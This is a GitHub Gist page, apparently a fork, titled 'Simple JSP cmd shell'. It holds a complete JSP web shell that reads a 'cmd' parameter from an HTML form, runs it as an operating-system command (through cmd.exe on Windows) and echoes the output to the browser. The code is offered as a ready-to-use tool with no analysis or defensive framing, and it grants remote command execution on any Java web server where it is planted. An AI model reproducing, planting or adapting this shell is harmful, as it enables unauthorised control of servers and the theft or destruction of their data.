Skip to content

Instantly share code, notes, and snippets.

@AlirezaChegini
Forked from nikallass/cmd.jsp
Created April 28, 2019 16:10
Show Gist options
  • Select an option

  • Save AlirezaChegini/855656c90652b88e9efd47241e2cc4ac to your computer and use it in GitHub Desktop.

Select an option

Save AlirezaChegini/855656c90652b88e9efd47241e2cc4ac to your computer and use it in GitHub Desktop.
Simple JSP cmd shell
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p;
if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
}
else{
p = Runtime.getRuntime().exec(request.getParameter("cmd"));
}
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment